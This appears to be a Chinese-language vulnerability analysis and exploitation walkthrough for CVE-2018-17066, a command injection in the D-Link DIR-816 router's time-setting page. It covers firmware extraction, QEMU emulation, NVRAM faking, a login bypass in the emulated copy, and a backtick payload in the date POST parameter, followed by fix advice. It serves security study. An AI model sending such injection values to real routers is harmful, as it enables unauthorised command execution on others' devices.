D-Link DIR-816 命令注入漏洞 (CVE-2018-17066) 深入分析与利用指南<\/h1>

漏洞概述<\/h2>

CVE-2018-17066 是 D-Link DIR-816 路由器中的一个高危命令注入漏洞。该漏洞存在于路由器的时间设置功能中，由于前端页面未对用户输入的时间参数进行有效过滤，导致攻击者可以通过构造恶意时间参数实现任意命令执行。<\/p>

漏洞原理<\/strong>：<\/p>

前端时间设置页面接收用户输入的时间数据<\/li>
输入数据未经任何过滤直接传输到后端处理<\/li>
后端通过 doSystem("date -s \"%s\"", Var)<\/code> 函数调用<\/li>
攻击者可在时间参数中嵌入系统命令，实现命令注入<\/li> <\/ul> 环境准备<\/h2> 所需工具<\/h3> Kali Linux 2023（自带 Burp Suite）<\/li> Ubuntu（用于固件提取）<\/li> QEMU（用于固件模拟）<\/li> Binwalk（固件分析工具）<\/li> IDA Pro（逆向分析工具）<\/li> <\/ul> 固件获取<\/h3> 访问 D-Link 官方技术支持网站下载固件：<\/p> D-Link Technical Support<\/a><\/li> <\/ul> <\/li> 下载固件文件：DIR-816.img<\/p> <\/li> <\/ol> 固件分析<\/h2> 使用 Binwalk 提取固件<\/h3> binwalk -Me DIR-816.img <\/span><\/span><\/code><\/pre>提取结果分析<\/strong>：<\/p> 4280396 (0x41504C): Linux kernel version 2.6.36<\/li> 4642928 (0x46D870): xz compressed data<\/li> 4764032 (0x48B180): Unix path: \/etc\/Wireless\/RT2860AP\/RT2860AP.dat<\/li> 4789596 (0x49155C): XML document<\/li> 提取出的文件系统：squashfs-root（根目录）<\/li> <\/ul> 文件系统分析<\/h3> 重点关注 \/bin\/goahead<\/code> 文件，这是路由器的 Web 服务器程序：<\/p> ELF 32-bit LSB executable<\/li> MIPS架构<\/li> 动态链接库：\/lib\/ld-uClibc.so.0<\/li> 已剥离符号表<\/li> <\/ul> 固件模拟执行<\/h2> QEMU 模拟方法<\/h3> 有两种方法模拟运行 goahead：<\/p> 动态版本 (qemu-mipsel)<\/strong>：<\/p> sudo qemu-mipsel -L .\/ .\/bin\/goahead <\/span><\/span><\/code><\/pre><\/li> 静态版本 (qemu-mipsel-static)<\/strong>：<\/p> cp $(<\/span>which qemu-mipsel-static)<\/span> .\/ <\/span><\/span>sudo chroot . .\/qemu-mipsel-static .\/bin\/goahead <\/span><\/span><\/code><\/pre><\/li> <\/ol> 常见错误及解决方案<\/h3> goahead.pid 未找到<\/strong>：<\/p> rm -rf .\/var\/run <\/span><\/span>mkdir .\/var\/run <\/span><\/span>touch .\/var\/run\/goahead.pid <\/span><\/span><\/code><\/pre><\/li> nvramd.pid 未找到<\/strong>：<\/p> touch .\/var\/run\/nvramd.pid <\/span><\/span><\/code><\/pre><\/li> 缺少二进制 IP 数据<\/strong>：这是由于 nvram_bufget 函数无法读取 lan_ipaddr 导致，需要模拟 NVRAM 设备。<\/p> <\/li> <\/ol> NVRAM 模拟方案<\/h3> 方案一：使用 LD_PRELOAD 劫持动态链接库<\/strong><\/p> 获取或编写 libnvram.so<\/li> 修改 config.h 中的配置： #define MOUNT_POINT "\/mnt\/libnvram\/" <\/span><\/span><\/span>#define OVERRIDE_POINT "\/mnt\/libnvram.override\/" <\/span><\/span><\/span><\/span>ENTRY("lan_ipaddr"<\/span>, nvram_set, "192.168.126.130"<\/span>) \ <\/span><\/span>ENTRY("lan_bipaddr"<\/span>, nvram_set, "192.168.126.255"<\/span>) \ <\/span><\/span><\/code><\/pre><\/li> 编译： mipsel-linux-gnu-gcc -c -O2 -fPIC -Wall nvram.c -o nvram.o <\/span><\/span>mipsel-linux-gnu-gcc -shared -nostdlib nvram.o -o libnvram.so <\/span><\/span><\/code><\/pre><\/li> 运行： chroot . .\/qemu-mipsel-static -E LD_PRELOAD=<\/span>".\/libnvram.so"<\/span> .\/bin\/goahead <\/span><\/span><\/code><\/pre><\/li> <\/ol> 方案二：Patch 原程序<\/strong><\/p> 使用 IDA 动态调试： chroot . .\/qemu-mipsel-static -g 23946<\/span> .\/bin\/goahead <\/span><\/span><\/code><\/pre><\/li> 在 IDA 中附加到进程<\/li> 修改关键跳转（如 0x45CDD4 处将 v0 赋值为 0）<\/li> <\/ol> 漏洞利用<\/h2> 绕过登录验证<\/h3> 方法一：修改前端 ASP 页面<\/strong><\/p> 找到 \/etc_ro\/web\/dir_login.asp<\/code><\/li> 修改 JavaScript 验证逻辑： function<\/span> onlogin<\/span>() { <\/span><\/span> \/* 注释掉所有验证代码 *\/<\/span> <\/span><\/span> return<\/span> true<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> <\/ol> 方法二：动态调试修改 strcmp 结果<\/strong><\/p> 在 IDA 中找到 strcmp 调用位置<\/li> 设置断点并修改返回值为 0<\/li> <\/ol> 命令注入实施<\/h3> 访问时间设置页面： http:\/\/192.168.126.131\/d_wizard_step1_start.asp <\/code><\/pre> <\/li> 使用 Burp Suite 拦截 POST 请求<\/li> 在时间参数中注入命令： date=`ls`2024-6-05 01:58:39 <\/code><\/pre> <\/li> 观察命令执行结果<\/li> <\/ol> 命令注入原理<\/h3> 后端处理逻辑：<\/p> doSystem("date -s <\/span>\"<\/span>%s<\/span>\"<\/span>"<\/span>, Var); <\/span><\/span><\/code><\/pre>攻击者可通过反引号或 $() 实现命令替换：<\/p> date -s "`ls`2024-6-05 01:58:39"<\/span> <\/span><\/span><\/code><\/pre>漏洞修复建议<\/h2> 对用户输入进行严格过滤和验证<\/li> 使用白名单方式限制时间格式<\/li> 避免直接将用户输入传递给系统命令<\/li> 使用安全的 API 替代 system() 调用<\/li> <\/ol> 总结<\/h2> CVE-2018-17066 是一个典型的前端输入未过滤导致的命令注入漏洞。通过分析固件、模拟执行环境和理解漏洞原理，安全研究人员可以深入理解此类漏洞的利用方式，并为防御类似漏洞提供参考。<\/p>